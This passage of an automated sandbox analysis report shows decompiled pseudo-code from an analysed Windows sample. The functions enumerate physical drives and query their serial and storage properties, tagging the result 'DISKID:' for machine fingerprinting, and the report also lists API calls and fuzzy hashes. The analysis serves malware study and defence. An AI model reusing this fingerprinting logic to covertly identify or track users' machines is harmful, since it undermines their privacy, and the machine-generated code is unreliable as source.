                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00C96A40(int* __ecx, int __edx, void* __ebp) {
				char _v4;
				char _v12;
				signed int _v16;
				char _v528;
				intOrPtr _v1500;
				int _v1504;
				int _v1512;
				int _v1516;
				char _v1518;
				void _v1528;
				char _v1792;
				char _v1796;
				intOrPtr _v2072;
				intOrPtr _v2076;
				char _v2080;
				intOrPtr _v2084;
				void _v2088;
				void _v2092;
				long _v2096;
				char _v2100;
				char _v2104;
				char _v2108;
				char _v2112;
				int* _v2116;
				char _v2120;
				long _v2124;
				char _v2128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t88;
				signed int _t90;
				void* _t96;
				int _t100;
				intOrPtr _t102;
				char* _t103;
				intOrPtr _t106;
				int _t110;
				int _t116;
				int _t120;
				int _t121;
				int _t125;
				int _t131;
				int _t135;
				WCHAR* _t153;
				void* _t154;
				int _t165;
				void* _t185;
				struct _OVERLAPPED* _t191;
				void* _t192;
				void* _t198;
				void* _t200;
				signed int _t201;

				_t173 = __edx;
				_push(0xffffffff);
				_push(0xd38f31);
				_push( *[fs:0x0]);
				_t201 = _t200 - 0x844;
				_t88 =  *0xd64070; // 0x8a9e1774
				_v16 = _t88 ^ _t201;
				_push(__ebp);
				_t90 =  *0xd64070; // 0x8a9e1774
				_push(_t90 ^ _t201);
				 *[fs:0x0] =  &_v12;
				_t184 = __ecx;
				_v2116 = __ecx;
				_v2112 = 0;
				do {
					_t198 = 0;
					_v2124 = 0;
					_t153 =  &_v528;
					_v4 = 0;
					E00C964E0(0x200, _t153, L"\\\\.\\PhysicalDrive%d", _v2112);
					_t201 = _t201 + 8;
					_t191 = 0;
					_t96 = CreateFileW(_t153, 0, 3, 0, 3, 0, 0);
					if(_t96 != 0xffffffff) {
						_t198 = _t96;
						_v2124 = _t198;
						L5:
						E00D006A0(_t184,  &_v1528, _t191, 0x3e8);
						_t201 = _t201 + 0xc;
						_v2092 = 0;
						_v2088 = 0;
						_v2084 = 0;
						_t173 =  &_v2092;
						_v2092 = _t191;
						_v2088 = _t191;
						_v2096 = _t191;
						_t100 = DeviceIoControl(_t198, 0x2d1400,  &_v2092, 0xc,  &_v1528, 0x3e8,  &_v2096, _t191);
						__eflags = _t100;
						if(_t100 == 0) {
							L39:
							_v4 = 0xffffffff;
							__eflags = _t198 - _t191;
							if(_t198 != _t191) {
								CloseHandle(_t198);
							}
							goto L41;
						}
						__eflags = _t198 - _t191;
						if(_t198 != _t191) {
							CloseHandle(_t198);
							_t198 = 0;
							__eflags = 0;
							_v2124 = 0;
						}
						__eflags = _v1518;
						if(_v1518 != 0) {
							goto L39;
						} else {
							_t106 = _v1500;
							__eflags = _t106 - 1;
							if(_t106 == 1) {
								goto L39;
							}
							__eflags = _t106 - 0xa;
							if(_t106 == 0xa) {
								goto L39;
							}
							__eflags = _t106 - 4;
							if(_t106 == 4) {
								goto L39;
							}
							__eflags = _t106 - 7;
							if(_t106 == 7) {
								goto L39;
							}
							__eflags = _t106 - 0xe;
							if(_t106 == 0xe) {
								goto L39;
							}
							__eflags = _t106 - 0xf;
							if(_t106 == 0xf) {
								goto L39;
							}
							E00C90B30( &_v2120);
							_t194 =  &_v2108;
							E00C90B30( &_v2108);
							_t164 = _v2112;
							_t173 =  &_v2120;
							_v4 = 2;
							_t110 = E00C96800(_v2112,  &_v2120, _t198,  &_v2108);
							_t201 = _t201 + 4;
							__eflags = _t110;
							if(_t110 == 0) {
								L17:
								E00C90B50( &_v2108, _t173);
								_v4 = 0;
								E00C90B50( &_v2120, _t173);
								_t116 = E00C96A20( &_v1528);
								__eflags = _t116;
								if(_t116 != 0) {
									_t173 =  &_v1792;
									E00D006A0(_t184,  &_v1792, 0, 0x104);
									_t201 = _t201 + 0xc;
									__eflags = _v1504;
									if(_v1504 == 0) {
										L26:
										_t184 = _v2116;
										_t165 =  *_v2116;
										__eflags =  *(_t165 - 0xc);
										if( *(_t165 - 0xc) == 0) {
											goto L18;
										}
										E00D006A0(_t184,  &_v1792, 0, 0x104);
										_t120 = _v1516;
										_t201 = _t201 + 0xc;
										__eflags = _t120;
										if(_t120 != 0) {
											_t194 = _t201 + _t120 + 0x26c;
											_t131 = E00C97250(0x104,  &_v1792,  &_v2104);
											__eflags = _t131;
											if(_t131 >= 0) {
												__eflags = 0x104;
												E00C97200(_t194, _t201 + _v2104 + 0x164, 0x104 - _v2104);
											}
										}
										__eflags = _v1792;
										if(_v1792 != 0) {
											StrTrimA( &_v1792, " ");
										}
										_t121 = _v1512;
										__eflags = _t121;
										if(_t121 != 0) {
											_t194 = _t201 + _t121 + 0x26c;
											_t125 = E00C97250(0x104,  &_v1792,  &_v2100);
											__eflags = _t125;
											if(_t125 >= 0) {
												__eflags = 0x104;
												E00C97200(_t194, _t201 + _v2100 + 0x164, 0x104 - _v2100);
											}
										}
										__eflags = _v1792;
										if(_v1792 != 0) {
											StrTrimA( &_v1792, " ");
											E00C96E50( &_v1792,  &_v1796, _v2120, _t194);
										}
										_t184 = _v2116;
										_t173 =  *_v2116;
										__eflags =  *(_t173 - 0xc);
										if( *(_t173 - 0xc) != 0) {
											L45:
											E00C96420( &_v2124);
											_t103 = 1;
											L43:
											 *[fs:0x0] = _v12;
											_pop(_t185);
											_pop(_t192);
											_pop(_t154);
											return E00D0071A(_t103, _t154, _v16 ^ _t201, _t173, _t185, _t192);
										} else {
											_t191 = 0;
											__eflags = 0;
											goto L39;
										}
									}
									_v2080 = 0x11c;
									_t194 = 1;
									_t135 = E00C8F7E0(2, _t164,  &_v1792,  &_v2080, _t198);
									__eflags = _t135;
									if(_t135 == 0) {
										L25:
										_t173 = 0x104;
										E00C92750(_t201 + _v1504 + 0x26c,  &_v1792, 0x104);
										E00C96700( &_v1792, _t198, _v2116, _t194);
										_t201 = _t201 + 8;
										goto L26;
									}
									__eflags = _v2076 - 6;
									if(__eflags > 0) {
										L24:
										_t194 = 0;
										__eflags = 0;
										goto L25;
									}
									if(__eflags != 0) {
										goto L25;
									}
									__eflags = _v2072 - 2;
									if(_v2072 < 2) {
										goto L25;
									}
									goto L24;
								}
								L18:
								_v4 = 0xffffffff;
								E00C96420( &_v2124);
								goto L41;
							}
							_t164 = _v2120;
							__eflags =  *(_t164 - 0xc);
							if( *(_t164 - 0xc) != 0) {
								E00C95320( &_v2120, _t184);
								_t173 =  *(_v2108 - 0xc);
								E00C90C60(_t184,  *(_v2108 - 0xc),  &_v2108, _t198, _t184, _v2108);
								E00C90B50( &_v2116,  *(_v2108 - 0xc));
								E00C90B50( &_v2128,  *(_v2108 - 0xc));
								goto L45;
							}
							goto L17;
						}
					}
					if(E00C963C0() == 0) {
						goto L5;
					} else {
						_v4 = 0xffffffff;
					}
					L41:
					_t102 = _v2112 + 1;
					_v2112 = _t102;
				} while (_t102 < 0x10);
				_t103 = 0;
				goto L43;
			}
























































                                                                                                                                                                                          0x00c96a40
                                                                                                                                                                                          0x00c96a40
                                                                                                                                                                                          0x00c96a42
                                                                                                                                                                                          0x00c96a4d
                                                                                                                                                                                          0x00c96a4e
                                                                                                                                                                                          0x00c96a54
                                                                                                                                                                                          0x00c96a5b
                                                                                                                                                                                          0x00c96a63
                                                                                                                                                                                          0x00c96a66
                                                                                                                                                                                          0x00c96a6d
                                                                                                                                                                                          0x00c96a75
                                                                                                                                                                                          0x00c96a7b
                                                                                                                                                                                          0x00c96a7d
                                                                                                                                                                                          0x00c96a81
                                                                                                                                                                                          0x00c96a89
                                                                                                                                                                                          0x00c96a89
                                                                                                                                                                                          0x00c96a8b
                                                                                                                                                                                          0x00c96a9e
                                                                                                                                                                                          0x00c96aa5
                                                                                                                                                                                          0x00c96aac
                                                                                                                                                                                          0x00c96ab1
                                                                                                                                                                                          0x00c96ab4
                                                                                                                                                                                          0x00c96ac1
                                                                                                                                                                                          0x00c96aca
                                                                                                                                                                                          0x00c96ae5
                                                                                                                                                                                          0x00c96ae7
                                                                                                                                                                                          0x00c96aeb
                                                                                                                                                                                          0x00c96af9
                                                                                                                                                                                          0x00c96afe
                                                                                                                                                                                          0x00c96b04
                                                                                                                                                                                          0x00c96b08
                                                                                                                                                                                          0x00c96b0c
                                                                                                                                                                                          0x00c96b24
                                                                                                                                                                                          0x00c96b2f
                                                                                                                                                                                          0x00c96b33
                                                                                                                                                                                          0x00c96b37
                                                                                                                                                                                          0x00c96b3b
                                                                                                                                                                                          0x00c96b41
                                                                                                                                                                                          0x00c96b43
                                                                                                                                                                                          0x00c96db4
                                                                                                                                                                                          0x00c96db4
                                                                                                                                                                                          0x00c96dbf
                                                                                                                                                                                          0x00c96dc1
                                                                                                                                                                                          0x00c96dc4
                                                                                                                                                                                          0x00c96dc4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96dc1
                                                                                                                                                                                          0x00c96b49
                                                                                                                                                                                          0x00c96b4b
                                                                                                                                                                                          0x00c96b4e
                                                                                                                                                                                          0x00c96b54
                                                                                                                                                                                          0x00c96b54
                                                                                                                                                                                          0x00c96b56
                                                                                                                                                                                          0x00c96b56
                                                                                                                                                                                          0x00c96b5a
                                                                                                                                                                                          0x00c96b62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96b68
                                                                                                                                                                                          0x00c96b68
                                                                                                                                                                                          0x00c96b6f
                                                                                                                                                                                          0x00c96b72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96b78
                                                                                                                                                                                          0x00c96b7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96b81
                                                                                                                                                                                          0x00c96b84
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96b8a
                                                                                                                                                                                          0x00c96b8d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96b93
                                                                                                                                                                                          0x00c96b96
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96b9c
                                                                                                                                                                                          0x00c96b9f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96ba9
                                                                                                                                                                                          0x00c96bae
                                                                                                                                                                                          0x00c96bb2
                                                                                                                                                                                          0x00c96bb7
                                                                                                                                                                                          0x00c96bc3
                                                                                                                                                                                          0x00c96bc7
                                                                                                                                                                                          0x00c96bce
                                                                                                                                                                                          0x00c96bd3
                                                                                                                                                                                          0x00c96bd6
                                                                                                                                                                                          0x00c96bd8
                                                                                                                                                                                          0x00c96be8
                                                                                                                                                                                          0x00c96bec
                                                                                                                                                                                          0x00c96bf5
                                                                                                                                                                                          0x00c96bfd
                                                                                                                                                                                          0x00c96c09
                                                                                                                                                                                          0x00c96c0e
                                                                                                                                                                                          0x00c96c10
                                                                                                                                                                                          0x00c96c30
                                                                                                                                                                                          0x00c96c3a
                                                                                                                                                                                          0x00c96c3f
                                                                                                                                                                                          0x00c96c42
                                                                                                                                                                                          0x00c96c4a
                                                                                                                                                                                          0x00c96cad
                                                                                                                                                                                          0x00c96cad
                                                                                                                                                                                          0x00c96cb1
                                                                                                                                                                                          0x00c96cb3
                                                                                                                                                                                          0x00c96cb7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96ccc
                                                                                                                                                                                          0x00c96cd1
                                                                                                                                                                                          0x00c96cd8
                                                                                                                                                                                          0x00c96cdb
                                                                                                                                                                                          0x00c96cdd
                                                                                                                                                                                          0x00c96cef
                                                                                                                                                                                          0x00c96cf6
                                                                                                                                                                                          0x00c96cfb
                                                                                                                                                                                          0x00c96cfd
                                                                                                                                                                                          0x00c96d08
                                                                                                                                                                                          0x00c96d13
                                                                                                                                                                                          0x00c96d13
                                                                                                                                                                                          0x00c96cfd
                                                                                                                                                                                          0x00c96d18
                                                                                                                                                                                          0x00c96d20
                                                                                                                                                                                          0x00c96d2f
                                                                                                                                                                                          0x00c96d2f
                                                                                                                                                                                          0x00c96d35
                                                                                                                                                                                          0x00c96d3c
                                                                                                                                                                                          0x00c96d3e
                                                                                                                                                                                          0x00c96d50
                                                                                                                                                                                          0x00c96d57
                                                                                                                                                                                          0x00c96d5c
                                                                                                                                                                                          0x00c96d5e
                                                                                                                                                                                          0x00c96d69
                                                                                                                                                                                          0x00c96d74
                                                                                                                                                                                          0x00c96d74
                                                                                                                                                                                          0x00c96d5e
                                                                                                                                                                                          0x00c96d79
                                                                                                                                                                                          0x00c96d81
                                                                                                                                                                                          0x00c96d90
                                                                                                                                                                                          0x00c96da1
                                                                                                                                                                                          0x00c96da1
                                                                                                                                                                                          0x00c96da6
                                                                                                                                                                                          0x00c96daa
                                                                                                                                                                                          0x00c96dac
                                                                                                                                                                                          0x00c96db0
                                                                                                                                                                                          0x00c96e31
                                                                                                                                                                                          0x00c96e35
                                                                                                                                                                                          0x00c96e3a
                                                                                                                                                                                          0x00c96dde
                                                                                                                                                                                          0x00c96de5
                                                                                                                                                                                          0x00c96ded
                                                                                                                                                                                          0x00c96dee
                                                                                                                                                                                          0x00c96df0
                                                                                                                                                                                          0x00c96e05
                                                                                                                                                                                          0x00c96db2
                                                                                                                                                                                          0x00c96db2
                                                                                                                                                                                          0x00c96db2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96db2
                                                                                                                                                                                          0x00c96db0
                                                                                                                                                                                          0x00c96c50
                                                                                                                                                                                          0x00c96c58
                                                                                                                                                                                          0x00c96c5d
                                                                                                                                                                                          0x00c96c62
                                                                                                                                                                                          0x00c96c64
                                                                                                                                                                                          0x00c96c79
                                                                                                                                                                                          0x00c96c87
                                                                                                                                                                                          0x00c96c93
                                                                                                                                                                                          0x00c96ca5
                                                                                                                                                                                          0x00c96caa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96caa
                                                                                                                                                                                          0x00c96c6a
                                                                                                                                                                                          0x00c96c6d
                                                                                                                                                                                          0x00c96c77
                                                                                                                                                                                          0x00c96c77
                                                                                                                                                                                          0x00c96c77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96c77
                                                                                                                                                                                          0x00c96c6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96c71
                                                                                                                                                                                          0x00c96c75
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96c75
                                                                                                                                                                                          0x00c96c12
                                                                                                                                                                                          0x00c96c16
                                                                                                                                                                                          0x00c96c21
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96c21
                                                                                                                                                                                          0x00c96bda
                                                                                                                                                                                          0x00c96bde
                                                                                                                                                                                          0x00c96be2
                                                                                                                                                                                          0x00c96e0c
                                                                                                                                                                                          0x00c96e15
                                                                                                                                                                                          0x00c96e1a
                                                                                                                                                                                          0x00c96e23
                                                                                                                                                                                          0x00c96e2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96e2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96be2
                                                                                                                                                                                          0x00c96b62
                                                                                                                                                                                          0x00c96ad3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c96ad5
                                                                                                                                                                                          0x00c96ad5
                                                                                                                                                                                          0x00c96ad5
                                                                                                                                                                                          0x00c96dca
                                                                                                                                                                                          0x00c96dce
                                                                                                                                                                                          0x00c96dd2
                                                                                                                                                                                          0x00c96dd2
                                                                                                                                                                                          0x00c96ddc
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C964E0: _vswprintf_s.LIBCMT ref: 00C9650C
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?), ref: 00C96AC1
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C96AF9
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00C96B3B
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?), ref: 00C96B4E
                                                                                                                                                                                            • Part of subcall function 00C963C0: GetLastError.KERNEL32(00C9689C), ref: 00C963C0
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C96C3A
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C96CCC
                                                                                                                                                                                          • StrTrimA.SHLWAPI(?,00D48A4C), ref: 00C96D2F
                                                                                                                                                                                          • StrTrimA.SHLWAPI(?,00D48A4C), ref: 00C96D90
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C96DC4
                                                                                                                                                                                            • Part of subcall function 00C90C60: _memcpy_s.LIBCMT ref: 00C90CEA
                                                                                                                                                                                            • Part of subcall function 00C96420: CloseHandle.KERNEL32(00000000,00C96C26), ref: 00C96427
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle_memset$Trim$ControlCreateDeviceErrorFileLast_memcpy_s_vswprintf_s
                                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                          • API String ID: 654334192-2935326385
                                                                                                                                                                                          • Opcode ID: 18f4c24d85e025c1c61c4644b93b24acd58ba4a265c26325affcc12822786f94
                                                                                                                                                                                          • Instruction ID: c836491f02acca7440e88486e7cb17c8d4bb929c9811b05a212aeb734f54778c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18f4c24d85e025c1c61c4644b93b24acd58ba4a265c26325affcc12822786f94
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2A1AF716083809FDB20EB24C84CB9FB7E4EB85714F504A2DF5A8932D1DB75DA49CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C866F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E00C866F0(signed int __edx, void* __edi, void* __esi, void* __ebp, signed int _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				void _v16;
				signed int _v20;
				long _v24;
				void* _v28;
				void* __ebx;
				signed int _t23;
				signed int _t25;
				signed int _t37;
				signed int _t39;
				void* _t42;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t59;
				void* _t60;
				void* _t62;
				void* _t63;
				signed int _t66;
				signed int _t67;

				_t61 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				_t66 =  &_v28;
				_t23 =  *0xd64070; // 0x8a9e1774
				_v4 = _t23 ^ _t66;
				_t25 = _a4;
				_v20 = _t25;
				_v28 = 0;
				_v24 = 0;
				if(_t25 == 0 || _a8 == 0) {
					__eflags = _t25 | 0xffffffff;
					return E00D0071A(_t25 | 0xffffffff, _t45, _v4 ^ _t66, _t57, _t58, _t61);
				} else {
					_push(_t45);
					_t46 = E00D017AD(_t45, __edx, __edi, 0x2800);
					_t67 = _t66 + 4;
					if(_t46 != 0) {
						_push(__esi);
						_push(__edi);
						_t59 = 0;
						do {
							E00C83BA0(_t46, 0x2800, "\\\\.\\PhysicalDrive%d", _t59);
							_t67 = _t67 + 8;
							_t62 = CreateFileA(_t46, 0, 3, 0, 3, 0x80, 0);
							__eflags = _t62 - 0xffffffff;
							if(_t62 == 0xffffffff) {
								goto L10;
							} else {
								_v16 = 0;
								_v12 = 0;
								_v8 = 0;
								_v16 = 0;
								_v12 = 0;
								E00D006A0(_t59, _t46, 0, 0x2800);
								_t67 = _t67 + 0xc;
								_t37 = DeviceIoControl(_t62, 0x2d1400,  &_v16, 0xc, _t46, 0x2800,  &_v24, 0);
								__eflags = _t37;
								if(_t37 != 0) {
									_t39 =  *(_t46 + 0x18);
									__eflags = _t39;
									if(_t39 > 0) {
										_t57 = _v20;
										__eflags = _t46 + _t39;
										_t42 = E00C86470(_a8, "DISKID:", _v20, _t46 + _t39);
										_t67 = _t67 + 0xc;
										_v28 = _t42;
									}
								}
								CloseHandle(_t62);
								__eflags = _v28;
								if(__eflags == 0) {
									goto L10;
								}
							}
							break;
							L10:
							_t59 = _t59 + 1;
							__eflags = _t59 - 0x10;
						} while (__eflags < 0);
						E00D0092B(_t46, _t57, _t59, _t62, __eflags);
						_t60 = _t46;
						_pop(_t63);
						_pop(_t47);
						__eflags = _v4 ^ _t67 + 0x00000004;
						return E00D0071A(_v28, _t47, _v4 ^ _t67 + 0x00000004, _t57, _t60, _t63);
					} else {
						SetLastError(8);
						_pop(_t48);
						return E00D0071A(_t28 | 0xffffffff, _t48, _v4 ^ _t67, _t57, __edi, __esi);
					}
				}
			}


























                                                                                                                                                                                          0x00c866f0
                                                                                                                                                                                          0x00c866f0
                                                                                                                                                                                          0x00c866f0
                                                                                                                                                                                          0x00c866f0
                                                                                                                                                                                          0x00c866f3
                                                                                                                                                                                          0x00c866fa
                                                                                                                                                                                          0x00c866fe
                                                                                                                                                                                          0x00c86705
                                                                                                                                                                                          0x00c86709
                                                                                                                                                                                          0x00c8670d
                                                                                                                                                                                          0x00c86713
                                                                                                                                                                                          0x00c86837
                                                                                                                                                                                          0x00c86842
                                                                                                                                                                                          0x00c86723
                                                                                                                                                                                          0x00c86723
                                                                                                                                                                                          0x00c8672e
                                                                                                                                                                                          0x00c86730
                                                                                                                                                                                          0x00c86735
                                                                                                                                                                                          0x00c86753
                                                                                                                                                                                          0x00c86754
                                                                                                                                                                                          0x00c86755
                                                                                                                                                                                          0x00c86760
                                                                                                                                                                                          0x00c8676b
                                                                                                                                                                                          0x00c86770
                                                                                                                                                                                          0x00c86786
                                                                                                                                                                                          0x00c86788
                                                                                                                                                                                          0x00c8678b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8678d
                                                                                                                                                                                          0x00c86795
                                                                                                                                                                                          0x00c86799
                                                                                                                                                                                          0x00c8679e
                                                                                                                                                                                          0x00c867a2
                                                                                                                                                                                          0x00c867a6
                                                                                                                                                                                          0x00c867aa
                                                                                                                                                                                          0x00c867af
                                                                                                                                                                                          0x00c867cb
                                                                                                                                                                                          0x00c867d1
                                                                                                                                                                                          0x00c867d3
                                                                                                                                                                                          0x00c867d5
                                                                                                                                                                                          0x00c867d8
                                                                                                                                                                                          0x00c867da
                                                                                                                                                                                          0x00c867dc
                                                                                                                                                                                          0x00c867e0
                                                                                                                                                                                          0x00c867ed
                                                                                                                                                                                          0x00c867f2
                                                                                                                                                                                          0x00c867f5
                                                                                                                                                                                          0x00c867f5
                                                                                                                                                                                          0x00c867da
                                                                                                                                                                                          0x00c867fa
                                                                                                                                                                                          0x00c86800
                                                                                                                                                                                          0x00c86804
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c86804
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c86806
                                                                                                                                                                                          0x00c86806
                                                                                                                                                                                          0x00c86807
                                                                                                                                                                                          0x00c86807
                                                                                                                                                                                          0x00c86811
                                                                                                                                                                                          0x00c8681d
                                                                                                                                                                                          0x00c8681e
                                                                                                                                                                                          0x00c8681f
                                                                                                                                                                                          0x00c86825
                                                                                                                                                                                          0x00c8682f
                                                                                                                                                                                          0x00c86737
                                                                                                                                                                                          0x00c86739
                                                                                                                                                                                          0x00c8673f
                                                                                                                                                                                          0x00c86752
                                                                                                                                                                                          0x00c86752
                                                                                                                                                                                          0x00c86735

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C86729
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008,?,?,?,?,?,00C86584,00000000,00002000,00C814D1), ref: 00C86739
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,00000000,00000003,00000000,00000003,00000080,00000000,00000000,00002000,?,?,?,?,?,00C86584,00000000), ref: 00C86780
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C867AA
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00C867CB
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00C86584,00000000,00002000,00C814D1), ref: 00C867FA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateCloseControlCreateDeviceErrorFileHandleHeapLast_malloc_memset
                                                                                                                                                                                          • String ID: DISKID:$\\.\PhysicalDrive%d
                                                                                                                                                                                          • API String ID: 2839847783-3765948602
                                                                                                                                                                                          • Opcode ID: 9c97ae486afcf56927ea77ac62d86148fcf98bc309559ab18d5fdeeb121672c5
                                                                                                                                                                                          • Instruction ID: 3c303666931648748b42ccd6e96e37fe707342c9650db1e874b3d9a4446fd114
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c97ae486afcf56927ea77ac62d86148fcf98bc309559ab18d5fdeeb121672c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C3108716043046FD200FF69EC86B2B7BD8EB84718F54492DF599C22C1DB30AA488BB7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C89CD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79memorythreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00C89CD0(intOrPtr* __ebx, void* __edi, void* __ebp) {
				long _v4;
				void* _v8;
				intOrPtr _v16;
				intOrPtr _t20;
				void* _t21;
				intOrPtr* _t22;
				long _t23;
				void* _t24;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr* _t33;
				void* _t34;
				void* _t42;
				void* _t46;
				void* _t48;

				_t48 = __ebp;
				_t42 = __edi;
				_t33 = __ebx;
				_v8 = 0;
				_v4 = GetCurrentThreadId();
				_t20 =  *__ebx;
				_t34 =  *(_t20 + 0x5b0);
				_t21 = _t20 + 8;
				 *(_t21 + 0x5b0) = _t34;
				if(_t34 != _t21) {
					 *(_t21 + 0x5b0) =  *(_t34 + 0x5a8);
				} else {
					_t34 = 0;
				}
				_t46 = _t34;
